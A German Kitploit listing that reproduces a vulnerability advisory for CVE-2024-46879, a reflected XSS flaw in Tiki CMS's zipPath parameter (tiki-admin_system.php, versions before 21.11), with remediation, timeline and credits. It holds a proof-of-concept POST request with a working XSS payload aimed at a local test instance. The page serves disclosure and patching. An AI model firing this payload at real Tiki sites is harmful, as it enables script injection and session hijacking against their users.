Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46879-TikiCMS-XSS — CVE-2024-46879 - Tiki CMS Reflektierte Cross-Site-Scripting (XSS) Sicherheitslücke | Kitploit
Tools/GitHubGitHub/coldfusionx/cve-2024-46879-tikicms-xss
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubcoldfusionx/cve-2024-46879-tikicms-xss

CVE-2024-46879-TikiCMS-XSS

CVE-2024-46879 - Tiki CMS Reflektierte Cross-Site-Scripting (XSS) Sicherheitslücke

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46879 - Tiki CMS Reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke

Tiki CMS - 'zipPath'-Parameter Reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke

Haftungsausschluss

Nur für Bildungs-, Forschungs- und Verteidigungszwecke bestimmt. Die unbefugte Nutzung gegen Systeme ohne Erlaubnis ist illegal.

Zusammenfassung

Eine Reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke existiert in den POST-Anforderungsdaten zipPath von tiki-admin_system.php in Tiki-Versionen vor Version 21.11. Diese Sicherheitslücke ermöglicht es Angreifern, über einen manipulierten Payload beliebigen JavaScript-Code auszuführen, was potenziell den Zugriff auf vertrauliche Informationen oder unbefugte Aktionen ermöglicht.

Betroffene(s) Produkt(e)

  • Produkt: Tiki CMS Groupware
  • Versionen: vor 21.11
  • Komponente: tiki-admin_system.php

Details zur Sicherheitslücke

Die Sicherheitslücke wird durch unzureichende Eingabebereinigung des zipPath-Parameters in verursacht. Die vom Benutzer bereitgestellte Eingabe wird in der HTTP-Antwort ohne ausreichende Kodierung reflektiert, was die Ausführung von injiziertem JavaScript ermöglicht.

tiki-admin_system.php

Auswirkungen

Ermöglicht einem authentifizierten Angreifer, über eine manipulierte Anfrage beliebiges JavaScript im Browser eines anderen Benutzers auszuführen, was potenziell zu Session-Hijacking oder unbefugten Aktionen führen kann.

Proof of Concept (PoC)

Anfrage

root@kitploit:~
POST /tiki-admin_system.php HTTP/1.1
Referer: http://127.0.0.1:9080/ 
Cookie: wiki_plugin_edit_view=true; tabs=%40tabs_wikipages%3A2%40admin_look%3A2%40admin_general%3A3; show_details=n; preview=%40preview_diff_style%3A; local_tz=Asia%2FCalcutta; javascript_enabled=y; PHPSESSID=120ab2736ae548eda9efcd2c862ac76c; PHPSESSIDCV=JHSjEwiO2tLPDG5yIJ2DQw%3D%3D
Host: 127.0.0.1:9080 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 
Accept: */* 
Content-Length: 94
Content-Type: application/x-www-form-urlencoded 

zipPath=%22'%3E<div%20on<svg/onmouseover="alert(document.domain)">Coldfx</div>"%20/%3E&zip=1

poc

Abhilfe

Das Problem wurde in Tiki CMS Groupware Version 21.11 behoben. Benutzern wird empfohlen, auf diese oder eine spätere gepatchte Version zu aktualisieren.

Herstellerverweis: https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended

Zeitplan

  • Dem Hersteller gemeldet: 5. September 2024
  • Bestätigung durch den Hersteller: 16. September 2024
  • Behoben in Version 21.11: 3. Januar 2025
  • Öffentliche Offenlegung (über dieses Repository): 23. März 2026

Danksagungen

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

Referenzen

  • https://www.cve.org/CVERecord?id=CVE-2024-46879
  • https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended
Tool herunterladen